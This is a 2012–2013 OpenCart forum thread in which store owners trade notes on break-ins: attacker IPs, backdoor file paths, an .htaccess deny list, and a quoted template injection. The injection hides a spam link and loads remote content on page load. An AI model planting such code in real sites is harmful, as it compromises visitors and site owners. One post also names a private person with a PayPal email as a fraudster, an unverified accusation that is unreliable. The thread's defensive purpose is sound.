Post by MarketInSG » Sun Dec 23, 2012 4:18 pm

Some hackers with Vietnam IPs had been going around trying to hack seller's store. Here's some information that might be useful.

Common IPs used by the hackers:

1.55.210.180
1.54.*.*
113.190.139.39
US Proxy Servers

Files to look out for in your system:

system/helper/helper.php
download/ (yourfilenames[dot]random_characters[dot]php_random_characters
modified trojan infected index.html in download folder
download/cp.php

Range of IP recommended to block as they switch between those IPs in Vietnam:

113.22.0.0/16
113.23.0.0/17
113.52.32.0/19
113.61.108.0/22
113.160.0.0/11
1.52.0.0/14

Anyway, the 113.x.x.x range commits a lot of frauds recently.

They also attempts to create an admin user account in the system.


User avatar
Guru Member

Posts

Joined
Wed Nov 16, 2011 11:53 am
Location - Singapore

Post by i2Paq » Sun Dec 23, 2012 4:25 pm

How would one go about blocking these via .htaccess?

This so others can block them if they're not selling in that area.

Thanks for posting btw.

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.


User avatar
Global Moderator

Posts

Joined
Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by MarketInSG » Sun Dec 23, 2012 4:42 pm

Not to be offensive, but I rarely have Vietnamese buyers. You just deny them through your .htaccess file. Entering the ip address/subnet will block off the whole range correctly.


User avatar
Guru Member

Posts

Joined
Wed Nov 16, 2011 11:53 am
Location - Singapore

Post by spikeachu » Sun Dec 23, 2012 7:41 pm

Just a heads up to anyone else affected;

If they've used the same tool as they have to hack mine, you might also want to clear your /tmp directory as they have placed key files in mine to allow themselves ssh access.

Wedding Invitations and Stationery by Love2print

Commercial Mods
Product Colours on Category Page
Cardsave Direct Gateway
Clear Cache
Promotional Watermarks on Images
Multiple Category / Product Templates ** Popular **
Log Failed Login Attempts
Display Eligible Coupons with Products
Twitter Feeds

Have I helped you out or saved you some time? Please donate


Active Member

Posts

Joined
Fri Mar 12, 2010 6:31 am

Post by i2Paq » Sun Dec 23, 2012 10:12 pm

JoseManuel wrote:Watch this topic open.http://forum.opencart.com/viewtopic.php?f=10&t=91623

The IPs and nationality of the attacks seen by me are not real.
I move that topic to the Moderators forum to have it analyzed.

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.


User avatar
Global Moderator

Posts

Joined
Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by trinkaljuneja » Sun Dec 23, 2012 10:17 pm

so we have to change admin default username/password

and for developers giving admin access to people to show their mods have to disable access to download tab via admin permission feature

is this all or i am missing something.....

A coder by Hobby and Developer by Profession

Images in Manufacture
http://www.opencart.com/index.php?route ... on_id=6943
Description and images in Manufacture
http://www.opencart.com/index.php?route ... on_id=6978

http://codertj.com


New member

Posts

Joined
Tue Aug 23, 2011 9:08 pm

Post by MarketInSG » Sun Dec 23, 2012 11:08 pm

if you main store is linked to the demo sites, change your database password! Check your error logs in OpenCart and cPanel. Deny the listed IPs is recommended. Monitor traffic accessing suspicious files that shouldn't be on your server. Monitor for a week to two consistently. A waste of time, but better be safe.


User avatar
Guru Member

Posts

Joined
Wed Nov 16, 2011 11:53 am
Location - Singapore

Post by MarketInSG » Sun Dec 23, 2012 11:26 pm

Another IP to note: 178.238.228.92.

The bad things about these hackers, they always forget to clear their footprints after they are done. And the bad things about us, we always don't take enough precaution. Best practice is to comment out the block of PHP codes that does uploading. Removing the javascript isn't enough. Or just change the folder's permission


User avatar
Guru Member

Posts

Joined
Wed Nov 16, 2011 11:53 am
Location - Singapore

Post by Demon5 » Mon Jan 14, 2013 11:02 am

i2Paq wrote:How would one go about blocking these via .htaccess?

This so others can block them if they're not selling in that area.

Thanks for posting btw.
order allow,deny
allow from all
deny from 88.131.106.0/24
deny from 180.76.5.0/24 # Baidu Spider
deny from 220.181.108.0/24 # Baidu
deny from 208.83.156.0/24
deny from 113.22.0.0/16
deny from 113.23.0.0/17
deny from 113.52.32.0/19
deny from 113.61.108.0/22
deny from 113.160.0.0/11
deny from 1.52.0.0/14

https://www.lotnllc.com is your one stop shop for all your computer needs!


User avatar
Active Member

Posts

Joined
Sat Jun 19, 2010 4:12 am
Location - Sacramento, CA

Post by sigue » Fri Feb 08, 2013 9:30 am

my website hacked two times in last two weeks, I can not login to admin panel even after the password reset via database phpmyadmin, at before I'm not realized that my website has been hacked until I noticed in user table of database that the IP address is not mine, then when I check the IP location it is from vietnam.
and yesterday I got someone from vietnam trying to steal my product by purchasing it with very low price, the product price is $19.95 but he only pay $0.01 to my paypal, I don't know how he can do it, fortunately the order status is pending so (maybe) he can't download the files.
is there anyone knows which system files that possible to be hacked that causing I can not login to admin?

every one becarefull with this IP :
113.166.96.13
123.21.178.196
93.139.33.141

and becarefull with this name (he register as Andrea Pots but I got his name in paypal payment detail) :
Minh Phuc Duong
paypal address: phucduongqb@zing.vn

THEMESOPENCART.COM


New member

Posts

Joined
Sat Aug 14, 2010 12:41 pm

Post by MarketInSG » Fri Feb 08, 2013 10:42 pm

if you provided demo sites, check all of them. Check your download folders if they made a backdoor program or some sort. Happy searching ~


User avatar
Guru Member

Posts

Joined
Wed Nov 16, 2011 11:53 am
Location - Singapore

Post by OpenCart Addons » Mon Feb 11, 2013 10:38 am

I noticed the suspicious file about the time this thread was started. Followed a lot of the good steps laid out in the previous posts and haven't had any issues since.


Cheers,

Joel.

Canada's Leading Expert In OpenCart Development & Certified OpenCart Development Partner Image


User avatar
Active Member

Posts

Joined
Thu Nov 24, 2011 10:51 am
Location - Canada

Post by sigue » Tue Mar 05, 2013 12:55 pm

I found someone has injected some code in header.tpl, footer.tpl, content_top.tpl files and maybe in other files, and I found it in (maybe) almost all of my demo theme links, I'm still on process checking the files now.
the code injected/inserted in notification div id in header.tpl file, so theme maker please check also your demo links files, maybe it also happen to you, but I hope not.

here is the code that has been injected:
<style>#getcms,.h1en{width:1px; height:1px; position:absolute; overflow:hidden;}</style>
<h1 class="h1en"><a href="http://cartcms.net" title="Cart CMS - Free Shopping Cart CMS" rel="dofollow">Cart CMS - Free Shopping Cart CSM</a>
<div id="getcms"></div></h1>
<script type="text/javascript"><!--
$(document).ready(function() {
$('#getcms').load('http://cartcms.net');
});
//--></script>

THEMESOPENCART.COM


New member

Posts

Joined
Sat Aug 14, 2010 12:41 pm
Who is online

Users browsing this forum: psytanium and 20 guests